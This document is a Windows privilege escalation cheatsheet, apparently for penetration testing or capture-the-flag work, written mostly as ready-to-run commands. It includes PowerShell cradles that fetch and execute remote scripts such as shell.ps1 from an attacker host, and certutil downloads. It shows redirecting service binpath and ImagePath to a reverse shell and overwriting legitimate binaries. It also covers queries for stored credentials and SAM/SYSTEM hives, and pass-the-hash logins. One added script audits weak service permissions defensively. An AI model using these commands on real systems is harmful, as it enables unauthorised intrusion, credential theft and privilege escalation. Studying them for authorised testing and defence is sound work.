
Windows Privilege Escalation Cheatsheet

So you got a shell, what now?

This post will help you with local enumeration as well as escalating your privileges further.

Using different enumeration scripts and tools is encouraged; my favourite is WinPEAS. If unsure which executable to use, use this.

Keep in mind:

  • To exploit services or registry keys, you need:

    • appropriate write permissions

    • service start permission

    • service stop permission

  • Look for non-standard programs on the system

Note: This is a live document. I’ll be adding more content as I learn more

Binaries

Get 64-bit netcat from here

Get Chisel from here

General Information

# If nothing is specified, assume the command can be run in cmd.exe or powershell.exe
whoami
echo %username%
whoami /all
hostname
echo %COMPUTERNAME%
net users
net users username
# Note hostname, patches, architecture
systeminfo

# PowerShell
# Check whether the OS and the current process are both 64-bit.
# Both should be the same for ease of exploitation; on a 64-bit OS, make a 64-bit shell using nc64.exe
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
# Check LanguageMode (FullLanguage is nicer to have)
$ExecutionContext.SessionState.LanguageMode
# Check AppLocker policy
Get-AppLockerPolicy -Effective
# View RuleCollections in detail
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
# all connections, addresses:port, PID
netstat -ano

File Transfer

# On KALI
# use double-quotes if the file path has spaces in it
sudo impacket-smbserver abcd /path/to/serve

# On Windows: mount the share as a drive
net use z: \\kali_ip\abcd
net use z: /delete # disconnect when done (/d is shorthand for /delete)
# PowerShell
New-PSDrive -Name "abcd" -PSProvider "FileSystem" -Root "\\kali_ip\abcd"
Remove-PSDrive -Name abcd
# OR copy directly from the share without mounting
copy \\kali_ip\abcd\file_name C:\path\to\save
copy C:\path\to\file \\kali_ip\abcd
# keep a copy of the original binary before replacing it
copy "C:\Program Files\...\legit.exe" C:\Temp
copy /Y C:\Downloads\shell.exe "C:\Program Files\...\legit.exe"

# Download to Windows
# Load script in memory
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ip/file')"
powershell.exe -c "iex(iwr http://ip/file -UseBasicParsing)"
# Save file on disk
powershell.exe -nop -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://ip/file','C:\Users\Public\Downloads\file')"
powershell.exe -nop -ep bypass -c "IWR -Uri 'http://ip/file' -OutFile 'C:\path\to\file'"
certutil -urlcache -f http://kali_ip/file file

Automated Enumeration

# Run winPEAS

# For color:

# > REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

# > cmd.exe

.\winpeasany.exe quiet

Accesschk

# .\accesschk.exe /accepteula
# -c : Name a windows service, or use * for all
# -d : Only process directories
# -k : Name a registry key e.g., hklm\software
# -q : Omit banner
# -s : Recurse
# -u : Suppress errors
# -v : Verbose
# -w : Show objects with write access

# Check service permissions
# ALWAYS RUN THE FOLLOWING TO CHECK IF YOU'VE PERMISSIONS TO START AND STOP THE SERVICE
.\accesschk.exe /accepteula -ucqv <user> <svc_name>
# Get all writable services as per groups
.\accesschk.exe /accepteula -uwcqv Users *
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *

# Is dir writable? - Unquoted service paths
.\accesschk.exe /accepteula -uwdv "C:\Program Files"
# User permissions on an executable
.\accesschk.exe /accepteula -uqv "C:\Program Files\...\file.exe"

# Find all weak permissions - folders
.\accesschk.exe /accepteula -uwdqs Users c:\
.\accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak permissions - files
.\accesschk.exe /accepteula -uwqs Users c:\*.*
.\accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*

# Registry ACL - Weak registry permissions
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\svc_name
# PowerShell (Get-Acl needs the HKLM: provider path)
Get-Acl HKLM:\System\CurrentControlSet\Services\svc_name | Format-List

# Get rights of any file, or folder
# PowerShell
(Get-Acl C:\path\to\file).Access | ft IdentityReference,FileSystemRights,AccessControlType
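The following is an added audit script, not part of the original cheatsheet: it walks every installed service and reports the two weaknesses the accesschk commands above look for one object at a time, an unquoted ImagePath containing spaces whose ancestor directories are writable by a broad group, and a service registry key writable by a broad group. The group names and the regex patterns for "write-class" rights are assumptions; generic rights that show up as raw numbers are not matched.

```powershell
# Added audit script (not part of the original cheatsheet). Flags services a
# low-privileged user could tamper with: unquoted ImagePath with spaces where an
# ancestor directory is writable by a broad group, and service registry keys
# writable by a broad group. Group names / rights patterns are assumptions.
$BroadGroups = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

function Test-BroadAllow {
    # True if any Allow ACE on $Path gives a broad group a right matching $Pattern
    param([string]$Path, [string]$Pattern, [string]$RightsProperty)
    $acl = Get-Acl -Path $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadGroups -notcontains $ace.IdentityReference.Value) { continue }
        if ("$($ace.$RightsProperty)" -match $Pattern) { return $true }
    }
    return $false
}

function Get-WeakServices {
    $svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem $svcRoot -ErrorAction SilentlyContinue) {
        $image = (Get-ItemProperty $key.PSPath -ErrorAction SilentlyContinue).ImagePath
        if (-not $image) { continue }
        $image = [Environment]::ExpandEnvironmentVariables($image)
        $findings = @()
        # Unquoted path with a space before the .exe: each space is a split point,
        # so every ancestor directory on the path must be non-writable.
        if ($image -notmatch '^"' -and $image -match '^[A-Za-z]:\\[^"]* [^"]*\.exe') {
            $dir = Split-Path (($image -split '\.exe')[0] + '.exe') -Parent
            while ($dir) {
                if (Test-BroadAllow $dir '\bWrite\b|CreateFiles|Modify|FullControl' 'FileSystemRights') {
                    $findings += "unquoted path, writable directory: $dir"
                }
                $dir = Split-Path $dir -Parent
            }
        }
        # Weak registry ACL: ImagePath of the service could be redirected
        if (Test-BroadAllow $key.PSPath 'SetValue|CreateSubKey|WriteKey|FullControl' 'RegistryRights') {
            $findings += 'service registry key writable by broad group'
        }
        if ($findings) {
            [pscustomobject]@{ Service = $key.PSChildName; ImagePath = $image; Findings = ($findings -join '; ') }
        }
    }
}

Get-WeakServices | Format-Table -AutoSize
```

Run it as the low-privileged user whose view of the ACLs you care about; anything it reports is a finding to fix (quote the path, tighten the ACL) or, on an engagement, to verify with the accesschk commands above.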

sc.exe

# In PowerShell use sc.exe explicitly (sc is an alias for Set-Content there)
# Query service configuration (verify again after making all the changes)
sc qc svc
# Current state of the service
sc query svc
# Modify config
sc config svc binpath= "\"C:\Downloads\shell.exe\""
# if dependencies exist, make sure they start first
sc config depend_svc start= auto
net start depend_svc
net start svc
# can instead remove the dependency too
sc config svc depend= ""
# Start/stop the service
net start svc
net stop svc

Registry

# Query configuration of registry entry of the service

reg query HKLM\System\CurrentControlSet\Services\svc_name

# Point the ImagePath to malicious executable

reg add HKLM\SYSTEM\CurrentControlSet\services\svc_name /v ImagePath /t REG_EXPAND_SZ /d C:\path\shell.exe /f

# Start/stop the service to get the shell

net start/stop svc

# Execute a reverse_shell.msi as admin (AlwaysInstallElevated)
# Check manually; both queries must return 0x1 for this to work

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Credentials or Hashes

# Common creds locations, stored in plaintext
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
# If found, prints the location of the file
dir /s <filename> # or extensions
dir /s SAM
dir /s SYSTEM
dir /s Unattend.xml

# Found creds?
# On KALI
# --system only works if admin creds are on hand
winexe -U 'admin%pass123' [--system] //10.10.10.10 cmd.exe
# Found hash?
pth-winexe -U 'domain\admin%LM:NTLM' [--system] //10.10.10.10 cmd.exe

RunAs

# cmd
runas /savecred /user:admin C:\abcd\reverse.exe

# PowerShell Runas 1
$password = ConvertTo-SecureString 'pass123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).DownloadString('http://kali_ip/shell.ps1')" -Credential $cred

# PowerShell Runas 2
$username = "domain\Administrator"
$password = "pass123"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object { $secstr.AppendChar($_) }
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $secstr
Invoke-Command -ScriptBlock { IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16/shell.ps1') } -Credential $cred -ComputerName localhost

Find Files Fast

dir /s <filename> # or extensions
Get-ChildItem -Path C:\ -Include *filename_wildcard* -Recurse -ErrorAction SilentlyContinue

Port Forwarding

# If some ports are listening on the target machine but are not reachable from KALI, forward them - Port Forwarding
# winexe, pth-winexe, smbexec.py and psexec work over 445; MySQL over 3306

# On KALI
./chisel server --reverse --port 9001
# On Windows
.\chisel.exe client KALI_IP:9001 R:KALI_PORT:127.0.0.1:WINDOWS_PORT
# Example --> .\chisel.exe client KALI_IP:9001 R:445:127.0.0.1:445
# On KALI (the forwarded service now answers on 127.0.0.1:KALI_PORT)
winexe -U 'administrator%pass123' --system //127.0.0.1 cmd.exe # needs KALI_PORT to be 445, as in the example above
smbexec.py domain/username:password@127.0.0.1
mysql --host=127.0.0.1 --port=KALI_PORT -u username -p

Exploit suggester

Windows exploit suggester can be found here

# On KALI
# Find exploits (update the database first)
# ./windows-exploit-suggester.py --update
./windows-exploit-suggester.py -i systeminfo.txt -d 2020-xxx.xlsx
